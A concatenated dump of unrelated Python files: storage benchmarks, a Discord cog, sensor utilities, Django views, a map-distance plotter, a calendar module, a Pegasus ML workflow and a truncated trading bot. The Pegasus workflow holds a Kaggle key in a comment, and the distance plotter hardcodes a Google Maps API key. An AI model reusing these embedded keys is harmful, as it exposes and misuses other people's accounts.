+{"seq_id":"539101088","text":"import time\n\nimport boto3\nimport fsspec\nimport h5py\nimport pytest\nimport requests\nimport s3fs\nimport tifffile\nfrom botocore import UNSIGNED\nfrom botocore.client import Config\n\nfs = s3fs.S3FileSystem(\n anon=True, client_kwargs={\"endpoint_url\": \"http://localhost:9000\"}\n)\n\nb3 = boto3.client(\n \"s3\",\n endpoint_url=\"http://localhost:9000\",\n config=Config(signature_version=UNSIGNED),\n)\n\n\ndef local(filename, loader=None):\n start = time.time()\n with open(f\"data/{filename}\", \"rb\") as o:\n if loader:\n loader(o)\n else:\n o.read()\n stop = time.time()\n return stop - start\n\n\ndef http(filename, loader=None):\n url = f\"http://localhost:8000/{filename}\"\n if loader:\n with fsspec.open(url) as f:\n loader(f)\n else:\n elapsed = requests.get(f\"http://localhost:8000/{filename}\").elapsed\n return elapsed.total_seconds()\n\n\ndef boto3(filename, loader=None):\n\n if loader is not None:\n pytest.skip()\n\n start = time.time()\n rsp = 
b3.get_object(Bucket=\"data\", Key=filename)\n rsp[\"Body\"].read()\n stop = time.time()\n return stop - start\n\n\ndef s3fs(filename, loader=None):\n start = time.time()\n with fs.open(f\"data/{filename}\") as f:\n if loader:\n loader(f)\n else:\n f.read()\n stop = time.time()\n return stop - start\n\n\n@pytest.mark.parametrize(\"method\", (local, http, boto3, s3fs))\ndef test_1_byte_overhead(benchmark, method):\n benchmark(method, \"1-byte\")\n\n\n@pytest.mark.parametrize(\"method\", (local, http, boto3, s3fs))\ndef test_zarr_chunk(benchmark, method):\n benchmark(method, \"retina_large.ome.zarr/0/0.0.0.0.0\")\n\n\n@pytest.mark.parametrize(\"method\", (local, http, boto3, s3fs))\ndef test_tiff_tile(benchmark, method):\n def loader(opened_file):\n with tifffile.TiffFile(opened_file) as tif:\n fh = tif.filehandle\n for page in tif.pages:\n fh.seek(page.dataoffsets[0])\n fh.read(page.databytecounts[0])\n return\n\n benchmark(method, \"retina_large.ome.tiff\", loader)\n\n\n@pytest.mark.parametrize(\"method\", (local, http, boto3, s3fs))\ndef test_hdf5_chunk(benchmark, method):\n def loader(opened_file):\n with h5py.File(opened_file) as f:\n data = f[\"DataSet\"][\"ResolutionLevel 0\"][\"TimePoint 0\"][\"Channel 0\"][\"Data\"]\n chunks = data.chunks\n len(data[0:chunks[0]-1, 0:chunks[1]-1, 0:chunks[2]-1])\n\n benchmark(method, \"retina_large.ims\", loader)\n\n\n@pytest.mark.parametrize(\"method\", (local, http, boto3, s3fs))\ndef test_download_1(benchmark, method):\n def loader(opened_file):\n opened_file.read()\n\n benchmark(method, \"retina_large.ims\", loader)\n\n\n@pytest.mark.parametrize(\"method\", (local, http, boto3, s3fs))\ndef test_download_2(benchmark, method):\n benchmark(method, \"retina_large.ims\")\n","sub_path":"t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"385504597","text":"from discord.ext import commands\n\n\n# New - The Cog class must extend the commands.Cog class\n\n\nclass Basic(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n # Define a new command\n @commands.command(\n name='ping',\n description='The ping command',\n aliases=['p']\n )\n async def ping_command(self, ctx):\n await ctx.send(\"pong\")\n\n\ndef setup(bot):\n bot.add_cog(Basic(bot))\n # Adds the Basic commands to the bot\n # Note: The \"setup\" function has to be there in every cog file\n","sub_path":"src/cogs/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"401241026","text":"import networkx as nx\nimport numpy as np\nfrom Subgraphs import star as st, read as rd\n\nraw = rd.read_samples()\ngraphs = []\nfor r in raw:\n m = np.matrix(r)\n g = nx.from_numpy_matrix(m)\n graphs.append(g)\n\ncnt = 1\nfor r in graphs:\n f = open(\"OUT/S1_3/\"+str(cnt)+\".txt\",\"w\")\n f.write(str(st.count_star(r)))\n f.close()\n cnt += 1\n","sub_path":"executables/Test06.py","file_name":"Test06.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"646669498","text":"\"\"\"\nMisc utility functions used in detection/quantification of STS transfers\n\nLukas Adamowicz\n2019-2020\nPfizer\n\"\"\"\n\nfrom numpy import zeros, ceil, mean, std, around, gradient, where, diff, insert, append, array, savetxt\nfrom numpy.lib import stride_tricks\nimport h5py\nimport udatetime as 
udt\n\n\n__all__ = ['tabulate_results']\n\n\ndef tabulate_results(results, csv_path, method='stillness'):\n \"\"\"\n Tabulate the results as calculated by the sequential pipeline.\n\n Parameters\n ----------\n results : {dict, str}\n Either a dictionary of the results, or the path to the h5 file where the results were stored.\n csv_path : str\n Path to save the tabular data at\n method : {'stillness', 'displacement'}, optional\n Which method to tabulate results for. Default is 'stillness'.\n \"\"\"\n # get the results\n days, times, duration, vdisp, mxa, mna, sparc = [], [], [], [], [], [], []\n mtd = f'{method.capitalize()} Method'\n if isinstance(results, dict):\n day_list = [i for i in results['Processed']['Sit2Stand'] if 'Day' in i]\n\n for day in day_list:\n days.extend([int(day[4:])] * results['Processed']['Sit2Stand'][day][mtd]['STS Times'].shape[0])\n times.extend(results['Processed']['Sit2Stand'][day][mtd]['STS Times'])\n duration.extend(results['Processed']['Sit2Stand'][day][mtd]['Duration'])\n vdisp.extend(results['Processed']['Sit2Stand'][day][mtd]['Vertical Displacement'])\n mxa.extend(results['Processed']['Sit2Stand'][day][mtd]['Max. Accel.'])\n mna.extend(results['Processed']['Sit2Stand'][day][mtd]['Min. Accel.'])\n sparc.extend(results['Processed']['Sit2Stand'][day][mtd]['SPARC'])\n else:\n with h5py.File(results, 'r') as f:\n day_list = [i for i in f['Processed/Sit2Stand'] if 'Day' in i]\n\n for day in day_list:\n days.extend([int(day[4:])] * f[f'Processed/Sit2Stand/{day}/{mtd}/STS Times'].shape[0])\n times.extend(f[f'Processed/Sit2Stand/{day}/{mtd}/STS Times'])\n duration.extend(f[f'Processed/Sit2Stand/{day}/{mtd}/Duration'])\n vdisp.extend(f[f'Processed/Sit2Stand/{day}/{mtd}/Vertical Displacement'])\n mxa.extend(f[f'Processed/Sit2Stand/{day}/{mtd}/Max. Accel.'])\n mna.extend(f[f'Processed/Sit2Stand/{day}/{mtd}/Min. Accel.'])\n sparc.extend(f[f'Processed/Sit2Stand/{day}/{mtd}/SPARC'])\n\n table = zeros((len(days), 12), dtype='object')\n table[:, 0] = days\n table[:, 1:3] = array(times)\n table[:, 7] = duration\n # table[:, 8] = vdisp\n table[:, 9] = mxa\n table[:, 10] = mna\n table[:, 11] = sparc\n\n for i, ts in enumerate(table[:, 1]):\n dt = udt.utcfromtimestamp(ts)\n table[i, 3] = dt.strftime('%Y-%m-%d %H:%M:%S.%f')\n table[i, 4] = dt.hour\n table[i, 5] = dt.minute\n table[i, 6] = dt.weekday() >= 5 # is the day a weekend. 0=Monday, 6=Sunday\n\n hdr = 'Day,Start Unix Time,End Unix Time,Start Time,Hour,Minute,Weekend,Duration,Vertical Displacement,' \\\n 'Max. Accel.,Min. 
Accel., SPARC'\n fmt = '%d, %f, %f, %s, %i, %i, %s, %f, %f, %f, %f, %f'\n savetxt(csv_path, table, header=hdr, fmt=fmt)\n\n\ndef mov_stats(seq, window):\n \"\"\"\n Compute the centered moving average and standard deviation.\n\n Parameters\n ----------\n seq : numpy.ndarray\n Data to take the moving average and standard deviation on.\n window : int\n Window size for the moving average/standard deviation.\n\n Returns\n -------\n m_mn : numpy.ndarray\n Moving average\n m_st : numpy.ndarray\n Moving standard deviation\n pad : int\n Padding at beginning of the moving average and standard deviation\n \"\"\"\n\n def rolling_window(x, wind):\n if not x.flags['C_CONTIGUOUS']:\n raise ValueError(\"Data must be C-contiguous to be able to window for moving statistics\")\n shape = x.shape[:-1] + (x.shape[-1] - wind + 1, wind)\n strides = x.strides + (x.strides[-1],)\n return stride_tricks.as_strided(x, shape=shape, strides=strides)\n\n m_mn = zeros(seq.shape)\n m_st = zeros(seq.shape)\n\n if window < 2:\n window = 2\n\n pad = int(ceil(window / 2))\n\n rw_seq = rolling_window(seq, window)\n\n n = rw_seq.shape[0]\n\n m_mn[pad:pad + n] = mean(rw_seq, axis=-1)\n m_st[pad:pad + n] = std(rw_seq, axis=-1, ddof=1)\n\n m_mn[:pad], m_mn[pad + n:] = m_mn[pad], m_mn[-pad - 1]\n m_st[:pad], m_st[pad + n:] = m_st[pad], m_st[-pad - 1]\n return m_mn, m_st, pad\n\n\ndef get_stillness(filt_accel, dt, window, gravity, thresholds):\n \"\"\"\n Stillness determination based on filtered acceleration magnitude and jerk magnitude\n\n Parameters\n ----------\n filt_accel : numpy.ndarray\n 1D array of filtered magnitude of acceleration data, units of m/s^2\n dt : float\n Sampling time, in seconds\n window : float\n Moving statistics window length, in seconds\n gravity : float\n Gravitational acceleration, as measured by the sensor during static periods.\n thresholds : dict\n Dictionary of the 4 thresholds to be used - accel moving avg, accel moving std, \n jerk moving avg, and jerk moving std. \n Acceleration average thresholds should be for difference from gravitional acceleration.\n\n Returns\n -------\n still : numpy.ndarray\n (N, ) boolean array of stillness (True)\n starts : numpy.ndarray\n (Q, ) array of indices where stillness starts. Includes index 0 if still[0] is True. Q < (N/2)\n stops : numpy.ndarray\n (Q, ) array of indices where stillness ends. Includes index N-1 if still[-1] is True. 
\n    # compute the sample window length from the time value\n    n_window = int(around(window / dt))\n    # compute the acceleration moving stats\n    acc_rm, acc_rsd, _ = mov_stats(filt_accel, n_window)\n    # compute the jerk\n    jerk = gradient(filt_accel, dt, edge_order=2)\n    # compute the jerk moving stats\n    jerk_rm, jerk_rsd, _ = mov_stats(jerk, n_window)\n\n    # create the stillness masks\n    arm_mask = abs(acc_rm - gravity) < thresholds['accel moving avg']\n    arsd_mask = acc_rsd < thresholds['accel moving std']\n    jrm_mask = abs(jerk_rm) < thresholds['jerk moving avg']\n    jrsd_mask = jerk_rsd < thresholds['jerk moving std']\n\n    still = arm_mask & arsd_mask & jrm_mask & jrsd_mask\n    starts = where(diff(still.astype(int)) == 1)[0]\n    stops = where(diff(still.astype(int)) == -1)[0]\n\n    if still[0]:\n        starts = insert(starts, 0, 0)\n    if still[-1]:\n        stops = append(stops, len(still) - 1)\n\n    return still, starts, stops","sub_path":"sit2standpy/v2/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":6669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"148680771","text":"\n\na=[]\nf = open(\"text\", \"r\")\nfor line in f.readlines():\n\ttemp = line.split(' ')\n\ttext=\"\"\n\tfor i in range(1,len(temp)-1):\n\t\ttext=text+temp[i]+\" \"\n\ttext=text+temp[len(temp)-1]\n\ta.append(text)\na.sort()\nout=\"\"\nfor i in range(0,len(a)):\n\tout=out+a[i]\nprint(out)\nf.close()\n\n","sub_path":"Speech RecognitionCode/recipe/corpus/LM/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"427893635","text":"from django.shortcuts import render, redirect\nfrom .forms import LoginForm, SignupForm, CreateBlog\nfrom .models import Blog\nfrom django.contrib.auth import login as django_login, logout as django_logout, authenticate\n\n# Create your views here.\ndef home(request):\n    return render(request, 'index.html')\n\ndef test(request):\n    if request.method == 'POST':\n        form = CreateBlog(request.POST)\n\n        if form.is_valid():\n            form.cleaned_data['author'] = request.user\n            form.save()\n            return redirect('test')\n        form.add_error(None, 'Please enter valid input')\n    else:\n        form = CreateBlog()\n    blog = Blog.objects.all()\n    page = request.user\n    return render(request, 'test.html', {'form':form, 'blog':blog, 'page':page})\n\ndef login(request):\n    if request.method == 'POST':\n        # URL to redirect to after a successful login; None if not given\n        next = request.GET.get('next')\n\n        # Create a data-bound form instance\n        # The first argument to AuthenticationForm must be the current request\n        login_form = LoginForm(request=request, data=request.POST)\n\n        # If validation succeeds\n        # With AuthenticationForm, validation only passes once the authenticate step has completed\n        if login_form.is_valid():\n            # Use this method to fetch the user that AuthenticationForm successfully authenticated\n            user = login_form.get_user()\n            # Call the login function provided by Django's auth app to keep the session on future requests/responses\n            django_login(request, user)\n            # Redirect to next if it exists, otherwise to the Post list view\n            return redirect(next if next else 'test')\n        # If authentication fails, add a non_field_error to login_form\n        login_form.add_error(None, 'The username or password is incorrect')\n    else:\n        login_form = LoginForm()\n\n    context = {\n        'login_form': login_form,\n    }\n    return render(request, 'login.html', context)\n\ndef signup(request):\n    if request.method == 'POST':\n        signup_form = SignupForm(request.POST)\n        # If validation passes (username uniqueness and password1/password2 match)\n        if signup_form.is_valid():\n            # Create the user, then log that User in\n            user = signup_form.save()\n            django_login(request, user)\n            return redirect('test')\n    else:\n        signup_form = SignupForm()\n\n    context = {\n        'signup_form': signup_form,\n    }\n    return render(request, 'signup.html', context)\n\ndef logout(request):\n    django_logout(request)\n    return redirect('/')","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"526771979","text":"import gmplot\nfrom src.utils.request_with_cache import get\nfrom src.solution.algorithm import cocktailSort\nfrom src.constant import html\n\nAPIKey = 'AIzaSyB7nJMebT6DAXDxqcZRO6rCovT7imtmyXE'\n\n\n# Get the distance from origin to destination\ndef __getDistance(origins, destinations):\n    baseUrl = \"https://maps.googleapis.com/maps/api/distancematrix/json\"\n    params = {\n        \"origins\": \"|\".join(f\"{x},{y}\" for x, y in origins),\n        \"destinations\": \"|\".join(f\"{x},{y}\" for x, y in destinations),\n        \"key\": APIKey\n    }\n\n    data = get(baseUrl, params)\n    distance = data['rows'][0]['elements'][0]['distance']['value']\n    return distance\n\n\ndef plotMap(couriers, customers):\n    # Initialize gmplot\n    gmaps = [gmplot.GoogleMapPlotter(*customer.originCoords, zoom=11,\n                                     apikey=APIKey, title=f\"Customer {customer.ID}\") for customer in customers]\n\n    # mark each courier company on the map\n    for gmap in gmaps:\n        for courier in couriers:\n            gmap.marker(*courier.coordinate, title=courier.name, label='H',\n                        info_window='Delivery Hub: {} ({} {})'.format(courier.location, *courier.coordinate))\n\n    # Calculate the best route based on shortest distance for all courier companies\n    for customer, gmap in zip(customers, gmaps):\n\n        # Get distance from origin to destination without going through the hub\n        customer.distance = __getDistance([customer.originCoords], [customer.desCoords]) / 1000\n\n        for courier in couriers:\n            # Get distance from origin to destination going through the hub\n            distance1 = __getDistance([customer.originCoords], [courier.coordinate])\n            distance2 = __getDistance([courier.coordinate], [customer.desCoords])\n            totalDistance = (distance1 + distance2) / 1000\n            customer.distanceThrough(courier, totalDistance)\n\n        sortedCouriers = cocktailSort(customer.distanceWithHub)\n\n        customer.minimumDistance = sortedCouriers[0][1]\n        customer.minDistanceHub = sortedCouriers[0][0].name\n\n        sortedCouriers.reverse()\n        for i, courierWithDist in enumerate(sortedCouriers):\n            colour, zIndex = ('red', 2) if i == 
len(sortedCouriers) - 1 else ('blue', 0)\n\n gmap.directions(customer.originCoords, customer.desCoords, color=colour, zIndex=zIndex,\n waypoints=[courierWithDist[0].coordinate])\n\n # Plot direction for shortest route in map for each customer\n gmap.directions(customer.originCoords, customer.desCoords, color='black', zIndex=1)\n\n # Draw the map to an HTML file:\n gmap.draw(f\"{html}/customer{customer.ID}.html\")\n","sub_path":"src/solution/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"189897882","text":"# Useful utilities for all calendar pages\nfrom __future__ import print_function, division\nimport os, json, subprocess, time, stat\nfrom sqlalchemy import *\n\nfrom event import calevent\nfrom parse import parse_ics, parse_xml\n\t\n\ndef get_feed_data():\n\t'''\t\n\t\tDESCRIPTION: retrieves feed data from master JSON file\n\t\tINPUT: None\n\t\tOUTPUT:\tcalendars -- imported calendar data\n\t'''\n\t# Read in data from master CSV file\n\tdir = os.path.dirname(os.path.realpath(__file__))\n\tfeed_file = '/'.join(dir.split('/')[0:-2]) + \"/opt/feeds.json\"\n\tff = open(feed_file, 'r')\n\tcalendars = json.load(ff)\n\tff.close()\n\treturn calendars\n\t\n\t\ndef write_feed_data(calendars):\n\tdir = os.path.dirname(os.path.realpath(__file__))\n\tfeed_file = '/'.join(dir.split('/')[0:-2]) + \"/opt/feeds_new.json\"\n\tff = open(feed_file, 'w')\n\tjson.dump(calendars, ff)\n\tff.close()\n\tsubprocess.check_output(\"mv ../opt/feeds_new.json ../opt/feeds.json\", shell=True)\n\t\n\ndef get_cal_data(force=False):\n\t# Determine whether calendar JSON file exists\n\tcal_json = '/'.join(os.path.dirname(os.path.realpath(__file__)).split('/')[0:-2]) + '/data/calendar.json'\n\tif os.path.isfile(cal_json):\n\t\tfile_age = time.time() - os.stat(cal_json)[stat.ST_MTIME]\n\t\tif file_age < 86400: regen = False\n\t\telse: regen = True\n\telse: regen = True\n\t\n\t# Regenerate calendar JSON file\n\tif regen or force:\n\t\tfeed_data = get_feed_data()\n\t\tevents = []\n\t\tfor f in range(len(feed_data)):\n\t\t\tif feed_data[f]['url'].find('.ics') >= 0: events = parse_ics(feed_data[f], events)\n\t\t\telse: events = parse_xml(feed_data[f], events)\n\t\t# Convert objects to dicts which can be JSON-ified\n\t\toutput_dicts = []\n\t\tfor e in events:\n\t\t\tedict = {}\n\t\t\tfor a in dir(e):\n\t\t\t\tif a.startswith('__') or callable(getattr(e,a)): continue\n\t\t\t\tedict[a] = getattr(e,a)\n\t\t\toutput_dicts.append(edict)\n\t\t# Write data to new JSON file\n\t\tof = open(cal_json, 'w')\n\t\tjson.dump(output_dicts, of)\n\t\tof.close()\n\t\t\n\t# Read everything in from JSON file\n\tdf = open(cal_json, 'r')\n\tdata = json.load(df)\n\tdf.close()\n\t\t\n\t# Read JSON data into objects\n\tevents = []\n\tfor d in data:\n\t\te = calevent()\n\t\tfor k,v in d.iteritems():\n\t\t\tsetattr(e, k, v)\n\t\tevents.append(e)\n\t\t\n\treturn events\n\n\ndef get_db_events(db):\n\t'''\n\t\tDESCRIPTION: Gets all currently-stored events in the database and returns them in the same object format as newly-input events\n\t\tINPUT: db -- database connection object created in webapp\n\t\tOUTPUT: eventList -- list of event objects for all events in database\n\t'''\n\t# Get table information\n\tsession = db.Session()\n\tsession.commit()\n\tmetadata = db.metadata\n\teventTable = Table('events', metadata, autoload=True)\n\n\t# Save all data to event list\n\teventList = []\n\tfor e in session.execute(\"SELECT * from 
caldata.events\").fetchall():\n\t\teventList.append(calevent())\n\t\teventList[-1].title, eventList[-1].description, eventList[-1].image, eventList[-1].organization = e[2], e[3].split('||'), e[4], e[5]\n\t\teventList[-1].displayStart, eventList[-1].displayEnd, eventList[-1].sortKey = e[6], e[7], e[8] \n\t\teventList[-1].latitude, eventList[-1].longitude, eventList[-1].displayLocation = e[9], e[10], e[11]\n\t\teventList[-1].categoryPrimary, eventList[-1].categorySecondary = e[12], e[13]\n\t\teventList[-1].contactEmail, eventList[-1].contactPhone = e[14], e[15]\n\t\teventList[-1].publicStatus, eventList[-1].capacity, eventList[-1].agerange = e[16], e[17], e[18]\n\t\teventList[-1].ticketstatus, eventList[-1].ticketinfo, eventList[-1].ticketlink, eventList[-1].ticketprice = e[19], e[20], e[21], e[22]\n\t\teventList[-1].hash = e[23]\n\treturn eventList\n\n\ndef add_db_event(db, eventList):\n\t'''\n\t\tDESCRIPTION: Adds event objects to database\n\t\tINPUT: db -- database connection object from webapp\n\t\t eventList -- list of calendar event objects to be added\n\t\tOUTPUT: None\n\t'''\n\tmetadata = db.metadata\n\teventTable = Table('events', metadata, autoload=True)\n\tfor eventObject in eventList:\n\t\ti = eventTable.insert()\n\t\ti.execute( title=eventObject.title, \n\t\t\t\t description='||'.join(eventObject.description),\n\t\t\t\t image=eventObject.image,\n\t\t\t\t organization=eventObject.organization,\n\t\t\t\t start=eventObject.displayStart,\n\t\t\t\t end=eventObject.displayEnd,\n\t\t\t\t sortkey=eventObject.sortKey,\n\t\t\t\t latitude=eventObject.latitude,\n\t\t\t\t longitude=eventObject.longitude,\n\t\t\t\t displaylocation=eventObject.displayLocation,\n\t\t\t\t categoryprimary=eventObject.categoryPrimary,\n\t\t\t\t categorysecondary=eventObject.categorySecondary,\n\t\t\t\t contactemail=eventObject.contactEmail,\n\t\t\t\t contactphone=eventObject.contactPhone,\n\t\t\t\t publicstatus=eventObject.publicStatus,\n\t\t\t\t capacity=eventObject.capacity,\n\t\t\t\t agerange=eventObject.ageRange,\n\t\t\t\t ticketstatus=eventObject.ticketStatus,\n\t\t\t\t ticketinfo=eventObject.ticketInfo,\n\t\t\t\t ticketlink=eventObject.ticketLink,\n\t\t\t\t ticketprice=eventObject.ticketPrice,\n\t\t\t\t hash=str(eventObject.hash)\n\t\t \t )\n\ndef delete_db_event(db, hash_to_delete):\n\tsession = db.Session()\n\tmetadata = db.metadata\n\teventTable = Table('events', metadata, autoload=True)\n\n\td = delete(eventTable, eventTable.c.hash == hash_to_delete)\n\tsession.execute(d)\n\tsession.commit()\n\n\n\t\n\n\n\n","sub_path":"python/calImport/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"344041972","text":"#!/usr/bin/env python\nimport logging\nfrom pathlib import Path\nfrom Pegasus.api import *\nimport glob\nimport os\nimport pandas as pd\nlogging.basicConfig(level = logging.DEBUG)\n\n#Properties\nprops = Properties()\nprops[\"dagman.retry\"] = \"100\"\nprops[\"pegasus.transfer.arguments\"] = \"-m 1\"\nprops.write()\n\n\n# import os\n# os.environ['KAGGLE_USERNAME'] = \"vedula\"\n# os.environ['KAGGLE_KEY'] = \"482a5c14ced45f63f3698eacb8fa0c62\"\n\n# import kaggle\n# kaggle.api.dataset_download_files('nikhilpandey360/chest-xray-masks-and-labels/download', path='.', unzip=True)\n\ntc = TransformationCatalog()\n\nunet_wf = Container(\n \"unet_wf\",\n Container.DOCKER,\n image=str(Path(\".\").resolve()/\"unet_cont.tar\"),\n image_site=\"local\"\n )\n\n\npreprocess = Transformation(\n 
\"preprocess\",\n site=\"condorpool\",\n pfn=\"/usr/bin/preprocess.py\",\n is_stageable=False,\n container=unet_wf\n )\n\n# preprocess.add_condor_profile(requirements = 'HAS_SINGULARITY == True')\n# preprocess.add_profiles(Namespace.CONDOR, key=\"+SingularityImage\", value='\"/cvmfs/singularity.opensciencegrid.org/vedularaghu/unet_wf:latest\"')\n\n\ndata_split = Transformation(\n \"data_split\",\n site=\"condorpool\",\n pfn=\"/usr/bin/data_split.py\",\n is_stageable=False,\n container=unet_wf\n )\n\n# data_split.add_condor_profile(requirements = 'HAS_SINGULARITY == True')\n# data_split.add_profiles(Namespace.CONDOR, key=\"+SingularityImage\", value='\"/cvmfs/singularity.opensciencegrid.org/vedularaghu/unet_wf:latest\"')\n\ntrain_model = Transformation( \n \"train_model\",\n site=\"condorpool\",\n pfn=\"/usr/bin/train_model.py\",\n is_stageable=False,\n container=unet_wf\n )\n\n# train_model.add_condor_profile(requirements = 'HAS_SINGULARITY == True')\n# train_model.add_profiles(Namespace.CONDOR, key=\"+SingularityImage\", value='\"/cvmfs/singularity.opensciencegrid.org/vedularaghu/unet_wf:latest\"')\n\n\ntc.add_containers(unet_wf)\ntc.add_transformations(preprocess, data_split, train_model)\ntc.write()\n\nfile_list = []\noutput_list = []\n\nrc = ReplicaCatalog()\n\nfor file in glob.glob(\"./train_images/*.png\"):\n f = file.replace(\"./train_images/\", '')\n file_list.append(File(f))\n rc.add_replica(\"local\", File(f), Path(\"./train_images/\").resolve() / f)\n \nfor file in glob.glob(\"./train_masks/*.png\"):\n f = file.replace(\"./train_masks/\", '')\n file_list.append(File(f))\n rc.add_replica(\"local\", File(f), Path(\"./train_masks/\").resolve() / f)\n \nfor file in glob.glob(\"./test/*.png\"):\n f = file.replace(\"./test/\", '')\n file_list.append(File(f))\n rc.add_replica(\"local\", File(f), Path(\"./test/\").resolve() / f)\n \n\n \ncheckpoint_file = \"study_checkpoint.pkl\"\nif not os.path.isfile(checkpoint_file):\n df = pd.DataFrame(list())\n df.to_pickle(checkpoint_file)\n\nrc.add_replica(\"local\", checkpoint_file, Path(\".\").resolve() / checkpoint_file)\n \nrc.write()\n\nfor filename in glob.glob(\"./train_images/*.png\"):\n f = filename.replace(\"./train_images/\", '').strip(\".png\")+\"_norm.png\"\n output_list.append(File(f))\n\n\nfor filename in glob.glob(\"./train_masks/*.png\"):\n f = filename.replace(\"./train_masks/\", '').strip(\".png\")+\"_norm.png\"\n output_list.append(File(f))\n\nfor filename in glob.glob(\"./test/*.png\"):\n f = filename.replace(\"./test/\", '').strip(\".png\")+\"_norm.png\"\n output_list.append(File(f))\n\n \nwf = Workflow(\"preprocess\")\n \njob_preprocess = Job(preprocess).add_inputs(*file_list).add_outputs(*output_list)\\\n\ndata_split_file = File(\"data_split.pkl\")\n\njob_data_split = Job(data_split).add_inputs(*output_list).add_outputs(data_split_file)\n\nmodel = File(\"model.h5\")\n\n\njob_train = Job(train_model)\\\n .add_checkpoint(File(checkpoint_file), stage_out=True)\\\n .add_inputs(*output_list, data_split_file)\\\n .add_outputs(model)\n\n\nwf.add_jobs(job_preprocess, job_data_split, job_train)\n\ntry:\n wf.plan(submit=True)\\\n .wait().analyze()\\\n .statistics()\nexcept PegasusClientError as e:\n print(e.output) \n\n\n\n\n\n","sub_path":"shared-data/UNet_wf/wf-docker.py","file_name":"wf-docker.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"126054791","text":"from django.shortcuts import render\nfrom django.http import 
HttpResponse\nfrom django.views.decorators.http import require_http_methods\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.template import loader \nfrom django.shortcuts import render\n\nfrom . import handler\n\ncontext = [{'template', ''}]\n# Create your views here.\n\n# test\ndef index(request):\n\treturn HttpResponse('你好')\n\n\n# 文件上传\n@csrf_exempt\n@require_http_methods(['POST'])\ndef upload(request):\n\tfile_obj = request.FILES.get('csv_file')\n\tif file_obj:\n\t\tfor chunk in file_obj.chunks():\n\t\t\tif len(chunk) > 100 * 1024 * 1024:\n\t\t\t\treturn HttpResponse('文件过大(100M)')\n\n\t\t\tsuffic = file_obj.name.split('.')[-1]\n\t\t\ttable_name = file_obj.name.split('.')[0]\n\t\t\tif len(suffic) != 0 and suffic == 'xlsx':\n\t\t\t\tif not handler.handle_table(chunk, table_name, 1, 1):\n\t\t\t\t\treturn HttpResponse(\"文件解析出错\")\n\t\t\telif len(suffic) != 0 and suffic == 'png':\n\t\t\t\tif not handler.handle_table(chunk, table_name, 1, 2):\n\t\t\t\t\treturn HttpResponse(\"文件解析出错\")\n\t\t\telse:\n\t\t\t\treturn HttpResponse(\"文件格式异常\")\n\n\t\treturn HttpResponse('上传成功')\n\n\n# 获取所有报表\ndef get_table(request):\n\tret = handler.get_all_table()\n\treturn HttpResponse(ret)\n\n\n# 查看表格\n@require_http_methods(['GET'])\ndef observe(request):\n\tcontext = handler.get_one_table(request.GET.get(\"t\"))\n\ttemplate = loader.get_template('table.html')\n\thtml_str = template.render(context, request)\n\treturn HttpResponse(html_str);\n\n\n# 删除表格\n@require_http_methods(['GET'])\ndef remove(request):\n\thandler.delete_table(request.GET.get(\"t\"));\n\treturn HttpResponse(open('static/basic-table.html', 'rb'), content_type='text/html');\n","sub_path":"db_system/ui/system/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"102693914","text":"\"\"\"\nExchain\n\"\"\"\n\nfrom storage import (\n read_config,\n connect_database, close_database,\n select_tickers, update_ticker,\n select_assets,\n select_previous_trade, insert_trade, select_unexecuted_trades, update_trade\n)\nfrom api import fetch_prices, notify_trades, bitflyer_trade\nfrom indicator import calculate_macd_histograms\nfrom analysis import analyze_macd\nfrom strategy import identify_overall_side, check_reversal\n\nTRADE_TYPE = 'market'\n\ndef main():\n \"\"\"\n Main\n \"\"\"\n connect_database(read_config('storage.database.mysql'))\n sides = []\n points = {}\n for ticker in select_tickers():\n prices = fetch_prices(\n ticker['exchange'],\n ticker['pair'],\n read_config('api.data_fetcher.interval'),\n read_config('api.data_fetcher.period')\n )\n if len(prices) == 0:\n continue\n side = analyze_macd(\n calculate_macd_histograms(prices)[-read_config('analysis.macd.period'):],\n read_config('analysis.macd.monotonic_period')\n )\n update_ticker(ticker['id'], side, prices[-1]['close'])\n if ticker['priority'] > 0:\n sides.append(side)\n points[ticker['id']] = {\n 'last_price': prices[-1]['close']\n }\n overall_side = identify_overall_side(sides, read_config('strategy.rule.consensus_threshold'))\n if overall_side is not None and overall_side != 'hold':\n trades = []\n for asset in [a for a in select_assets()]:\n previous_trade = select_previous_trade(a['id'])\n if check_reversal(previous_trade, overall_side):\n price = points[asset['ticker_id']]['last_price']\n insert_trade(asset['id'], overall_side, price, asset['amount'], TRADE_TYPE)\n trades.append({\n 'api': asset['api'],\n 'exchange': asset['exchange'],\n 
